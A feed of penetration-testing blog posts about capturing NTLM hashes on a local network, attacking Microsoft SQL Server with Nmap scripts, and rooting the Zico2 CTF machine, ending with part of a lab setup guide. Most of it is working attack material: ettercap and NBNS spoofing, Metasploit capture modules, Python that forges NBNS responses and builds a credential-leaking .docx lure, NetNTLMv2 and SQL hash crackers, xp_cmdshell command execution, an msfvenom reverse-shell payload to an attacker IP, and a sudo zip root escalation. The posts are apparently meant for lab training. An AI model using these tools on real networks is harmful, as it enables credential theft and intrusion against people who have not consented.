News from 'Hacking Articles'

Raj Chandel's Blog

4 Ways to Capture NTLM Hashes in Network

Sun, 15/Oct/2017 - 20:26

Hello friends! Today we describe how to capture NTLM hashes on a local network. In this article the NTLM hash is captured four times, each time by a different method. Before we move on to the attack techniques, here is a brief introduction to NTLM hashes.

The acronym for word NTLM is made by combining following terms:

NT: New Technology (Windows)

LAN: Local area network

M: Manager

In a Windows network, NT LAN Manager (NTLM) is a suite of Microsoft security protocols that provides authentication, integrity and confidentiality to users. It was the default network authentication protocol in Windows NT 4.0. NTLMv2 is the current version of the challenge-response protocol. The stored credential behind it is the NT hash: MD4 of the UTF-16LE password, 128 bits long, used for both local and domain accounts. NTLMv2 never sends that hash over the network; it sends a response computed with HMAC-MD5, keyed by the NT hash, over the server challenge and client data.

The NT hash (and the older LM hash) stored on the server or domain controller is unsalted and therefore password-equivalent: whoever obtains it can authenticate without knowing the password (pass-the-hash). What the four methods below capture from the wire is different: a NetNTLMv2 challenge-response. It cannot be replayed as a hash, but it can be cracked offline to recover the password, or relayed to another host while the connection is still open.

For more information visit Wikipedia.org

Let’s Begin!!

Requirement

Attacker: Kali Linux

Target: Windows 10

Capture NTLMv2 hash through Sniffing

As the attacker, open the file /etc/ettercap/etter.dns on the Kali system, replace its whole contents with the single line given below (it maps every name to the attacker's IP) and save the file.

* A 192.168.1.103

Now follow the steps below to run ettercap and start sniffing.

  • Applications > Sniffing & Spoofing > ettercap
  • Click on Sniff and select your network interface.
  • Scan for hosts to generate the target list.

Select the host and add it to the target list. In the image, among the 5 hosts found, 192.168.1.101 was chosen and added as Target 1.

Click on MITM in the menu bar and select ARP poisoning; in the dialog box that pops up enable "Sniff remote connections" and click OK.

Then click on Plugins in the menu bar and choose dns_spoof.

With dns_spoof the attacker answers the victim's DNS queries with his own IP, so whatever site the victim opens in his web browser is redirected to the attacker's machine.

Now load the Metasploit Framework and execute the following commands to use the http_ntlm module, which "attempts to quietly catch NTLM/LM Challenge hashes".

use auxiliary/server/capture/http_ntlm

msf auxiliary(http_ntlm) > set SRVHOST 192.168.1.103

msf auxiliary(http_ntlm) > set SRVPORT 80

msf auxiliary(http_ntlm) > set URIPATH /

msf auxiliary(http_ntlm) > set JOHNPWFILE /root/Desktop/

msf auxiliary(http_ntlm) > exploit

With the trap above in place, this module captures the victim's NTLM response as soon as he opens any HTTP web site in his browser, because the spoofed DNS answer sends that request to the attacker's IP.

In the image below the victim is trying to browse "hackingarticles.in", but the page demands authentication and asks for his username and password. If he tries something else, say google.com, the same prompt appears; until he submits a username and password he cannot browse anything.

As soon as the victim enters his username and password, the attacker captures the NTLM response in the background.

Great!! The attacker has captured the NTLMv2 response. Besides the hash value itself, the image shows that two more details were captured:

Username: pentest

Machine name: Desktop-UKIQM20

Now use John the Ripper to crack the NetNTLMv2 response. JOHNPWFILE is a filename prefix, so with the setting above the module wrote the capture to /root/Desktop/_netntlmv2:

john --format=netntlmv2 /root/Desktop/_netntlmv2

John's default single-crack and incremental modes find a password as short as this one quickly; for real targets pass a dictionary with --wordlist. From the image below you can confirm that the password 123 for user pentest was recovered by cracking the NTLMv2 response.

Capture NTLMv2 hash through capture SMB & spoof NBNS

This module provides an SMB service that can be used to capture the challenge-response password hashes of SMB client systems. Responses sent by this service carry a configurable challenge string, by default 1122334455667788, which allows easy cracking with Cain & Abel, L0phtCrack or John the Ripper (jumbo). To exploit this, the target system must try to authenticate to this module.

use auxiliary/server/capture/smb

msf auxiliary(smb) > set srvhost 192.168.1.103

msf auxiliary(smb) > set JOHNPWFILE /tmp/john_smb

msf auxiliary(smb) > exploit

At the same time, run the nbns_response module alongside the capture/smb module.

This module forges NetBIOS Name Service (NBNS) responses. It will listen for NBNS requests sent to the local subnet’s broadcast address and spoof a response, redirecting the querying machine to an IP of the attacker’s choosing. Combined with auxiliary/server/capture/smb or auxiliary/server/capture/http_ntlm it is a highly effective means of collecting crackable hashes on common networks. This module must be run as root and will bind to udp/137 on all interfaces.

use auxiliary/spoof/nbns/nbns_response

msf auxiliary(nbns_response) > set SPOOFIP 192.168.1.103

msf auxiliary(nbns_response) > set INTERFACE eth0

msf auxiliary(nbns_response) > exploit

As a result, whenever the victim's machine resolves a name over NBNS (for example when he types the name of a file server into Explorer), it is answered with the attacker's IP, and the capture/smb module then presents the victim with a Windows security prompt asking for credentials to reach the shared folder.

An nmap UDP and TCP port scan was used to identify open ports and protocols; in the image you can see that UDP port 137 is open for the NetBIOS Name Service.

Now when the victim tries to access the shared folder he is in fact connecting to the attacker's IP 192.168.1.103, as the image below shows.

Having been pointed at the attacker, the victim is caught by the fake Windows security prompt, which asks him to enter his username and password to access the shared folder.
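The NBNS frames that nbns_response forges, as an added example that is not part of the original article or of the Metasploit module: the Python below builds the victim's name query and the attacker's spoofed positive response offline in the RFC 1002 wire format, and parses both sides. The transaction ID, the name FILESRV01 and the flag values are constructed here; a real poisoner would read the query from UDP/137 and send the response back to the querier.

```python
"""NBNS name query and spoofed positive name-query response (RFC 1002 wire format).
Added example, not from the original article: builds and parses the frames offline,
the same frames that auxiliary/spoof/nbns/nbns_response exchanges on UDP/137."""
import socket
import struct

NB_RR_TYPE = 0x0020               # NB resource record type
NB_CLASS_IN = 0x0001
SUFFIX_FILE_SERVER = 0x20         # <20> File Server Service, the suffix SMB clients ask for
FLAGS_QUERY = 0x0110              # opcode QUERY, broadcast, recursion desired
FLAGS_POSITIVE_RESPONSE = 0x8500  # response, authoritative answer, recursion desired


def encode_nb_name(name: str, suffix: int = SUFFIX_FILE_SERVER) -> bytes:
    """First-level encoding: 15 space-padded upper-case chars + suffix byte, each nibble -> 'A'..'P'."""
    raw = name.upper()[:15].ljust(15).encode("ascii") + bytes([suffix])
    encoded = bytes(b for c in raw for b in (ord("A") + (c >> 4), ord("A") + (c & 0x0F)))
    return bytes([len(encoded)]) + encoded + b"\x00"


def decode_nb_name(pkt: bytes, off: int):
    """Inverse of encode_nb_name; returns (name, suffix, offset just past the name)."""
    length = pkt[off]
    enc = pkt[off + 1:off + 1 + length]
    if length != 32 or pkt[off + 1 + length] != 0:
        raise ValueError("malformed NetBIOS name")
    raw = bytes(((enc[i] - 65) << 4) | (enc[i + 1] - 65) for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15], off + 1 + length + 1


def build_query(txid: int, name: str, suffix: int = SUFFIX_FILE_SERVER) -> bytes:
    """What the victim broadcasts when it cannot resolve a name by DNS."""
    header = struct.pack(">HHHHHH", txid, FLAGS_QUERY, 1, 0, 0, 0)
    return header + encode_nb_name(name, suffix) + struct.pack(">HH", NB_RR_TYPE, NB_CLASS_IN)


def parse_query(pkt: bytes):
    txid, flags, qdcount, _, _, _ = struct.unpack(">HHHHHH", pkt[:12])
    if flags & 0x8000 or qdcount != 1:
        raise ValueError("not an NBNS name query")
    name, suffix, off = decode_nb_name(pkt, 12)
    qtype, qclass = struct.unpack(">HH", pkt[off:off + 4])
    if qtype != NB_RR_TYPE or qclass != NB_CLASS_IN:
        raise ValueError("not an NB name query")
    return txid, name, suffix


def build_spoofed_response(query: bytes, spoof_ip: str, ttl: int = 165) -> bytes:
    """The poisoner's answer: same transaction ID and name, RDATA pointing at spoof_ip."""
    txid, name, suffix = parse_query(query)
    rdata = struct.pack(">H", 0x0000) + socket.inet_aton(spoof_ip)  # NB_FLAGS: unique name, B-node
    header = struct.pack(">HHHHHH", txid, FLAGS_POSITIVE_RESPONSE, 0, 1, 0, 0)
    rr = encode_nb_name(name, suffix) + struct.pack(">HHIH", NB_RR_TYPE, NB_CLASS_IN, ttl, len(rdata)) + rdata
    return header + rr


def parse_response(pkt: bytes):
    """Victim side: extract (txid, name, ip) from a positive name-query response."""
    txid, flags, _, ancount, _, _ = struct.unpack(">HHHHHH", pkt[:12])
    if not flags & 0x8000 or ancount != 1:
        raise ValueError("not an NBNS response")
    name, _, off = decode_nb_name(pkt, 12)
    _, _, _, rdlen = struct.unpack(">HHIH", pkt[off:off + 10])
    off += 10
    ip = socket.inet_ntoa(pkt[off + 2:off + 2 + 4])  # skip the 2-byte NB_FLAGS
    return txid, name, ip


if __name__ == "__main__":
    q = build_query(0x1234, "FILESRV01")            # constructed victim query
    r = build_spoofed_response(q, "192.168.1.103")  # attacker IP from the article
    print(parse_response(r))
```

The response only has to reuse the query's transaction ID and name, which is all a client checks; nothing in NBNS authenticates the answer, so the first responder on the wire wins. The same parser, run over captured traffic, lets a defender flag responses whose RDATA points at a host that never registered the name.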

Awesome!! Once again the attacker has captured the NTLMv2 response, and as the image shows, the same two details with it:

Username: pentest

Machine name: Desktop-UKIQM20

Again use John the Ripper to crack the NTLMv2 response; this time the JOHNPWFILE prefix /tmp/john_smb means the capture is in /tmp/john_smb_netntlmv2:

john --format=netntlmv2 /tmp/john_smb_netntlmv2

From the image below you can confirm that the password 123 for user pentest was recovered by cracking the NTLMv2 response.

Capture NTLMv2 hash through capture SMB & word UNC injector

This module modifies a .docx file that will, upon opening, submit stored netNTLM credentials to a remote host. It can also create an empty docx file. If emailed the receiver needs to put the document in editing mode before the remote server will be contacted. Preview and read-only mode do not work. Verified to work with Microsoft Word 2003, 2007, 2010, and 2013.

use auxiliary/docx/word_unc_injector

msf auxiliary(word_unc_injector) > set LHOST 192.168.1.103

msf auxiliary(word_unc_injector) > exploit

It has created an empty docx file, msf.docx, under /root/.msf4/local/.

Now send this msf.docx file to the victim and run the capture/smb module in Metasploit again, as done previously.

From the image below you can observe that the auxiliary/server/capture/smb module is used to receive the hashes.

As soon as the victim opens msf.docx in editing mode, Word tries to reach the UNC path embedded in the document and authenticates to the attacker's SMB server with the logged-on user's credentials, so the attacker again captures the NTLMv2 response. The difference from the two attacks above is that no credential prompt is shown to the victim: only the NTLMv2 response is captured, silently.
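How the document reaches out to the attacker, as an added example that is not the Metasploit module's own code: the Python below builds a minimal .docx whose settings part carries an attached-template relationship to a UNC path, the kind of external relationship that makes Word contact that host over SMB when the document enters editing mode, and a companion function lists every external relationship in any .docx so such lures can be triaged. The UNC target on 192.168.1.103, the share and the file name are assumed here; the exact XML the module writes is not reproduced from it.

```python
"""Build a .docx whose attached template lives on a UNC path, and scan any .docx for external
relationships. Added example, not the Metasploit module's own code; the attacker host
192.168.1.103 comes from the article, the share and template names are assumed."""
import io
import re
import zipfile

NS_PKG = "http://schemas.openxmlformats.org/package/2006/relationships"
NS_DOC = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
NS_W = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
    '<Default Extension="xml" ContentType="application/xml"/>'
    '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
    '<Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/>'
    '</Types>'
)
ROOT_RELS = (f'<Relationships xmlns="{NS_PKG}">'
             f'<Relationship Id="rId1" Type="{NS_DOC}/officeDocument" Target="word/document.xml"/>'
             '</Relationships>')
DOCUMENT = (f'<w:document xmlns:w="{NS_W}"><w:body><w:p><w:r><w:t>Quarterly report</w:t></w:r></w:p>'
            '</w:body></w:document>')
DOCUMENT_RELS = (f'<Relationships xmlns="{NS_PKG}">'
                 f'<Relationship Id="rId1" Type="{NS_DOC}/settings" Target="settings.xml"/>'
                 '</Relationships>')


def settings_xml() -> str:
    # The attachedTemplate element only carries a relationship id; the UNC path lives in the .rels part.
    return f'<w:settings xmlns:w="{NS_W}" xmlns:r="{NS_DOC}"><w:attachedTemplate r:id="rId1"/></w:settings>'


def settings_rels(unc_target: str) -> str:
    # TargetMode="External" makes Word fetch the template from that location when editing starts.
    return (f'<Relationships xmlns="{NS_PKG}">'
            f'<Relationship Id="rId1" Type="{NS_DOC}/attachedTemplate" Target="{unc_target}" TargetMode="External"/>'
            '</Relationships>')


def build_docx(unc_target: str) -> bytes:
    """Minimal but valid OOXML package with the external template relationship."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES)
        z.writestr("_rels/.rels", ROOT_RELS)
        z.writestr("word/document.xml", DOCUMENT)
        z.writestr("word/_rels/document.xml.rels", DOCUMENT_RELS)
        z.writestr("word/settings.xml", settings_xml())
        z.writestr("word/_rels/settings.xml.rels", settings_rels(unc_target))
    return buf.getvalue()


_REL_TAG = re.compile(r"<Relationship\b[^>]*>")
_ATTR = re.compile(r'(\w+)="([^"]*)"')


def external_targets(docx_bytes: bytes):
    """Triage helper: every (part, Target) relationship marked External across all .rels parts."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for part in z.namelist():
            if not part.endswith(".rels"):
                continue
            for tag in _REL_TAG.findall(z.read(part).decode("utf-8")):
                attrs = dict(_ATTR.findall(tag))
                if attrs.get("TargetMode") == "External":
                    found.append((part, attrs.get("Target", "")))
    return found


def smb_lure_targets(docx_bytes: bytes):
    """Only the targets that would make Word authenticate to a remote host (UNC or file://)."""
    return [t for _, t in external_targets(docx_bytes)
            if t.startswith("\\\\") or t.lower().startswith("file://")]


if __name__ == "__main__":
    lure = build_docx(r"\\192.168.1.103\share\template.dotx")  # assumed share and file name
    print(smb_lure_targets(lure))
```

Scanning the .rels parts rather than the document text is the point: the UNC never appears in document.xml, so a keyword search over the visible content misses it.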

Again use John the Ripper to crack the NTLMv2 response, pointing it at the file the capture/smb module wrote (with the JOHNPWFILE prefix used above, /tmp/john_smb_netntlmv2):

john --format=netntlmv2 /tmp/john_smb_netntlmv2

From the image below you can confirm that the password 123 for user pentest was recovered by cracking the NTLMv2 response.

Responder

Responder, created by Laurent Gaffie, is an LLMNR, NBT-NS and mDNS poisoner with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication servers, so it can perform all of the attacks above on its own. It answers specific NBT-NS (NetBIOS Name Service) queries based on their name suffix; by default the tool only answers File Server Service requests, which are the ones SMB clients send.

This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389, TCP 1433, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141, TCP 25, TCP 110, TCP 587 and multicast UDP 5355 (LLMNR).

Now open the new terminal and type following command to download it from github:

git clone https://github.com/SpiderLabs/Responder.git

cd Responder

Once it is downloaded, execute the following command to run the Python script, giving the interface to listen on and the IP to answer with:

python Responder.py -I eth0 -i 192.168.1.103

From the image you can see that all the poisoners and server services are switched on.

Now when the victim again tries to access a shared folder by name, he is answered with the attacker's IP and connects to it; the image below shows the victim connecting to the attacker's IP 192.168.1.103.

When the victim tries to access the shared folder, he is caught by a fake network error prompt, as shown in the image below.

Once again the attacker has successfully captured the NTLMv2 response, and as the image shows, the same two details with it:

Username: pentest

Machine name: Desktop-UKIQM20

It stores each captured hash in a text file under Responder/logs (here /root/Desktop/Responder/logs), named after the protocol and the victim's IP.

Again use John the Ripper to crack the NTLMv2 response by pointing it at that log file:

john --format=netntlmv2 logs/<capture file>

From the image below you can confirm that the password 123 for user pentest was recovered by cracking the NTLMv2 response.
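What John is actually doing in each of the four cracking steps above, as an added example that is not part of the original article or of John the Ripper: the Python below recomputes a NetNTLMv2 response from a candidate password and compares it with the captured one, using a line in the same user::domain:challenge:NTProofStr:blob format the capture modules write. MD4 is implemented inline because hashlib's md4 is missing on many OpenSSL 3 builds. The capture line, the timestamp and the client nonce inside the blob are constructed in the block; the user pentest, the machine DESKTOP-UKIQM20, the password 123 and Metasploit's default challenge 1122334455667788 come from the article.

```python
"""Offline check of a captured NetNTLMv2 response (john "netntlmv2" line format).
Added example, not from the original article; the capture line is constructed here."""
import hashlib
import hmac
import os
import struct


def _lrot(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, pure Python: hashlib.new('md4') is unavailable on many OpenSSL 3 builds."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (range(16), (3, 7, 11, 19), 0, F),
        ((0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999, G),
        ((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1, H),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for ks, ss, const, fn in rounds:
            for i, k in enumerate(ks):
                a = _lrot((a + fn(b, c, d) + X[k] + const) & 0xFFFFFFFF, ss[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers, as in the RFC's [ABCD]/[DABC]/... steps
        a, b, c, d = ((a + aa) & 0xFFFFFFFF, (b + bb) & 0xFFFFFFFF,
                      (c + cc) & 0xFFFFFFFF, (d + dd) & 0xFFFFFFFF)
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4 of the UTF-16LE password, unsalted (the value pass-the-hash reuses)."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_hash(password: str, user: str, domain: str) -> bytes:
    """NTLMv2 key: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain, UTF-16LE."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def nt_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr: HMAC-MD5 keyed with the NTLMv2 key over server challenge || blob."""
    return hmac.new(ntlmv2_hash(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def make_john_line(user: str, domain: str, password: str, server_challenge: bytes = None) -> str:
    """Construct a capture line in the format the capture modules write (constructed sample data)."""
    server_challenge = server_challenge or bytes.fromhex("1122334455667788")  # Metasploit's default
    # blob: signature 0x0101, reserved, fixed FILETIME timestamp, client nonce, reserved, empty AV list
    blob = (b"\x01\x01\x00\x00" + b"\x00" * 4 + struct.pack("<Q", 132000000000000000)
            + os.urandom(8) + b"\x00" * 4 + b"\x00\x00\x00\x00" + b"\x00" * 4)
    proof = nt_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def verify_netntlmv2(line: str, candidate: str) -> bool:
    """Recompute NTProofStr for a candidate password and compare it with the captured one."""
    user, _, domain, chal_hex, proof_hex, blob_hex = line.strip().split(":", 5)
    got = nt_proof(candidate, user, domain, bytes.fromhex(chal_hex), bytes.fromhex(blob_hex))
    return hmac.compare_digest(got, bytes.fromhex(proof_hex))


def crack(line: str, wordlist):
    """Tiny wordlist loop: the same check john --format=netntlmv2 performs at scale."""
    for word in wordlist:
        if verify_netntlmv2(line, word):
            return word
    return None


if __name__ == "__main__":
    sample = make_john_line("pentest", "DESKTOP-UKIQM20", "123")
    print(sample)
    print(crack(sample, ["password", "letmein", "123"]))
```

The user name is upper-cased and the domain is left as captured before keying; getting either case wrong makes every candidate fail, which is a common reason a known-good password does not crack. Nothing here can be replayed: the proof is bound to the server challenge, so without the NT hash itself or a live relay the only route is cracking.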

Wonderful! These were the four ways to trap the target user in order to capture NTLM hashes.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, social media lover and gadgets enthusiast.

The post 4 Ways to Capture NTLM Hashes in Network appeared first on Hacking Articles.

Categories: Cyber India

MSSQL Peneration Testing using Nmap

Fri, 13/Oct/2017 - 23:05

Hello friends! Today we are going to perform Microsoft SQL penetration testing using Nmap scripts in order to retrieve basic information such as database names, usernames, table names and so on from a SQL Server instance running on Windows. In our previous article we set up Microsoft SQL Server on Windows 10.

Requirement

Attacker: kali Linux (NMAP)

Target: Windows 10 (MS SQL Server)

Let's start!!

Scan port 1433

Open the terminal in Kali Linux and scan the target IP for port 1433 using nmap.

nmap -p 1433 192.168.1.104

From the image below you can observe that port 1433 is open and running the MS-SQL service.

Enumerating version information

The command below attempts to determine configuration and version information for Microsoft SQL Server instances.

nmap -p 1433 --script ms-sql-info 192.168.1.104

In the image below you can observe the installed version and details of the MS-SQL server.

Brute Force Attack

The command below attempts to determine usernames and passwords by a brute-force attack against MS-SQL using a username and password dictionary.

nmap -p 1433 --script ms-sql-brute --script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.104

In the image you can observe that credentials for two users were retrieved:

  • Username: ignite and password: 12345
  • Username: sa and password: 123

Execute MS-SQL Query

Once you have retrieved login credentials, use them in the Nmap script to execute an MS-SQL query. The command below runs the stored procedure "sp_databases" against the Microsoft SQL Server.

"sp_databases" is one of the system stored procedures and lists the database names on an instance of SQL Server.

nmap -p 1433 --script ms-sql-query --script-args mssql.username=sa,mssql.password=admin123,ms-sql-query.query="sp_databases" 192.168.1.104

As a result it dumped two database names, "ignite" and "master"; master is the default system database of MS-SQL Server.

Check Microsoft SQL server configuration

The following command attempts to describe the Microsoft SQL Server configuration settings, passing the login credentials as arguments to the Nmap script.

nmap -p 1433 --script ms-sql-config --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

Hence you can check configuration setting from given below image.

Obtain list of tables

The following command attempts to fetch the list of tables from the Microsoft SQL Server, passing the login credentials as arguments to the Nmap script.

nmap -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

Hence you can check the list of tables in the image below.

Enumerate NetBIOS information

The Nmap script below enumerates information from remote Microsoft SQL services with NTLM authentication enabled.

Sending an MS-TDS NTLM authentication request with an invalid domain and null credentials causes the remote service to respond with an NTLMSSP message that discloses information including the NetBIOS name, DNS name and OS build version.

nmap -p 1433 --script ms-sql-ntlm-info 192.168.1.104

Hence in the image below you can read the NetBIOS information of the remote Microsoft SQL Server.

Dump password hashes

The following command dumps the password hashes from an MS-SQL server in a format suitable for cracking by tools such as John the Ripper. To do so the user needs the appropriate DB privileges.

nmap -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

From the image you can observe that it dumped the password hash of user sa, which we enumerated above.
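The hashes ms-sql-dump-hashes prints, as an added example that is not part of the article or of Nmap: SQL Server stores a login's password as a version word, a 4-byte salt and a digest of the UTF-16LE password followed by the salt (SHA-1 for 2005 to 2008 R2, version 0x0100; SHA-512 for 2012 and later, version 0x0200). The Python below rebuilds that format from a known password and salt, parses a dumped value and checks candidate passwords against it. The salt values and the login:hash lines are constructed here; admin123 and 123 are the passwords used in the article.

```python
"""Verify candidate passwords against SQL Server login hashes (sys.sql_logins.password_hash,
the value ms-sql-dump-hashes prints). Added example, not from the article or Nmap; the
hashes below are constructed from known passwords and salts, not taken from the lab."""
import hashlib
import hmac
import os

VERSION_SHA1 = 0x0100    # SQL Server 2005 - 2008 R2
VERSION_SHA512 = 0x0200  # SQL Server 2012 and later


def _digest_fn(version: int):
    if version == VERSION_SHA512:
        return hashlib.sha512
    if version == VERSION_SHA1:
        return hashlib.sha1
    raise ValueError("unknown SQL Server hash version 0x%04x" % version)


def mssql_hash(password: str, salt: bytes = None, version: int = VERSION_SHA512) -> str:
    """'0x' + version(2) + salt(4) + digest(UTF-16LE(password) || salt), upper-case hex."""
    salt = salt if salt is not None else os.urandom(4)
    if len(salt) != 4:
        raise ValueError("salt must be 4 bytes")
    digest = _digest_fn(version)(password.encode("utf-16-le") + salt).digest()
    return "0x" + (version.to_bytes(2, "big") + salt + digest).hex().upper()


def parse_mssql_hash(hash_hex: str):
    """Split a dumped value into (version, salt, digest), rejecting malformed input."""
    raw = bytes.fromhex(hash_hex[2:] if hash_hex.lower().startswith("0x") else hash_hex)
    version = int.from_bytes(raw[:2], "big")
    salt, digest = raw[2:6], raw[6:]
    if len(digest) != _digest_fn(version)().digest_size:
        raise ValueError("digest length does not match hash version")
    return version, salt, digest


def verify_mssql_password(hash_hex: str, candidate: str) -> bool:
    version, salt, digest = parse_mssql_hash(hash_hex)
    got = _digest_fn(version)(candidate.encode("utf-16-le") + salt).digest()
    return hmac.compare_digest(got, digest)


def crack_dump(dump_lines, wordlist):
    """Take 'login:hash' lines like the script prints and return {login: password} for each hit."""
    hits = {}
    for line in dump_lines:
        login, _, h = line.strip().partition(":")
        for word in wordlist:
            if verify_mssql_password(h, word):
                hits[login] = word
                break
    return hits


if __name__ == "__main__":
    # constructed dump: sa on a 2012+ server, ignite on a 2008-era server
    dump = [
        "sa:" + mssql_hash("admin123", bytes.fromhex("deadbeef")),
        "ignite:" + mssql_hash("123", bytes.fromhex("01020304"), VERSION_SHA1),
    ]
    print(crack_dump(dump, ["password", "123", "admin123"]))
```

The salt is per login, so each dumped hash has to be attacked separately, but a 4-byte salt and a single unkeyed digest still make these hashes fast to brute-force; that is why the dump is worth taking and why weak sa passwords matter.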

Identify database owner

The following command queries Microsoft SQL Server instances for the list of databases a user has access to. To do so the user needs the appropriate DB privileges, therefore the username and password are passed as arguments to the Nmap script.

nmap -p 1433 --script ms-sql-hasdbaccess --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

In the image you can observe that it shows user sa is the owner of the database "ignite".

MS-SQL allows the xp_cmdshell option

xp_cmdshell is an extended stored procedure of Microsoft SQL Server that lets system administrators execute operating system commands. By default the xp_cmdshell option is disabled.

From the image below you can see we enabled xp_cmdshell by executing the following statements in the master database (it is an advanced option, so "show advanced options" has to be switched on first):

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;

Now save the above configuration setting with the following statement:

RECONFIGURE;

Exploit the xp_cmdshell function

Now the following Nmap script attempts to run a command through the command shell of Microsoft SQL Server if xp_cmdshell is enabled on the target server; the command is given with the ms-sql-xp-cmdshell.cmd argument (the default is ipconfig /all).

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=admin123,ms-sql-xp-cmdshell.cmd="net user" 192.168.1.104

From the image you can confirm that we executed the OS command net user and retrieved the user accounts.

Blank password leads to unauthorized access

If the administrator of Microsoft SQL Server leaves the login password blank, an attacker can log straight into the database server. In the image below we are looking at the properties of the user account "sa".

Here a blank password was set for user "sa". By default sa is the administrator of MS-SQL Server, and now that its password is blank the chance of an attacker gaining unauthorized access to the server increases.

Make unauthorized access into SQL server

The following Nmap script tries to authenticate to Microsoft SQL Servers using an empty password for the sysadmin (sa) account.

nmap -p 1433 --script ms-sql-empty-password 192.168.1.104

From the image below you can see that we logged in successfully with user sa and an empty password.

Author: Sanjeet Kumar is an Information Security Analyst, Pentester and Researcher.


Hack the Zico2 VM (CTF Challenge)

Fri, 13/Oct/2017 - 21:52

Hello friends! Today we are going to take on another CTF challenge known as Zico2. Credit for making this VM goes to "Rafael", and it is another boot2root challenge, where we have to root the system to complete it. You can download this VM here.

Let's Breach!!!

Let us start by finding the IP of the VM (here it is 192.168.0.26, but you will have to find your own).

netdiscover

Use nmap for port enumeration.

nmap -sV 192.168.0.26

We find port 80 is open, so we open this IP in our browser.

Browsing through the site we find that it is vulnerable to LFI.

We couldn't find anything else of note, so we use dirb to find directories.

dirb http://192.168.0.26/

We find an interesting link called dbadmin and open it in our browser.

On this page we find another link; it leads us to the phpliteadmin login page.

We tried the password "admin", and it granted us access.

We find that this version of phpliteadmin is vulnerable to PHP code injection.

So we create another database and name it shell.php; we use this database to inject PHP code.

After injecting our code we use the LFI to execute our shell. Here we can see that the ls command was executed when we ran our shell.

Now we create executable file using msfvenom.

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.25 lport=4444 -f elf > /root/Desktop/shell

We move it to /var/www/html/ and then set up our listener in Metasploit.

We then use the PHP code injection to upload our file to the server, make it executable, and execute it.

We execute the PHP code through the LFI and get a reverse shell.

After searching through the files we find the password for user zico in /home/zico/wordpress/wp-config.php

We use this password to log in through SSH.

After searching through the files, we take a look at the sudoers file and find that we are allowed to run a few commands as root.

Now we move to the /tmp folder and find the files we uploaded earlier. We use zip to gain root privileges: its -T (test archive) option runs the given unzip command, which sudo executes as root:

sudo -u root zip shell.zip shell.py -T --unzip-command="sh -c /bin/bash"

After gaining root privileges we move to the root folder. Inside it we find a file called flag.txt, and when we open it we are greeted by a message congratulating us on completing the challenge.

Author: Sayantan Bera is a technical writer at Hacking Articles and a cyber security enthusiast.


MS-SQL Penetration Testing lab Setup

Wed, 11/Oct/2017 - 17:23

Hello friends!! Today you will learn how to install and configure MS SQL Server on the Windows 10 operating system.

Requirement:

  1. Download setup file ENU\x64\SQLEXPR_x64_ENU.exe
  2. Download setup file ENU\x86\SQLManagementStudio_x86_ENU.exe from here
  3. Download heidisql tool

Configure SQL Express setup

Open the first downloaded file for SQL Server installation and run it as administrator. Click on Installation, then go with "New SQL Server stand-alone installation".

To install SQL Server 2012 follow the three steps below:

  • License terms
  • Product updates
  • Install setup files

Here enable the check box "I accept the license terms" and click on Next.

Enable the check box "Include SQL Server product updates" to enhance SQL Server security and performance. It found a 26 MB update online, which is installed when you click on Next.

Now it starts installing the SQL Server setup files on your system, which takes some time. As soon as setup is installed you get the feature-selection screen for your SQL Server.

Feature Selection

Now select the features you want to install; in the image you can see I enabled the check boxes for the following features.

  • Database Engine Services
  • SQL Server Replication
  • SQL Client Connectivity SDK

Click on next.

Instance Configuration

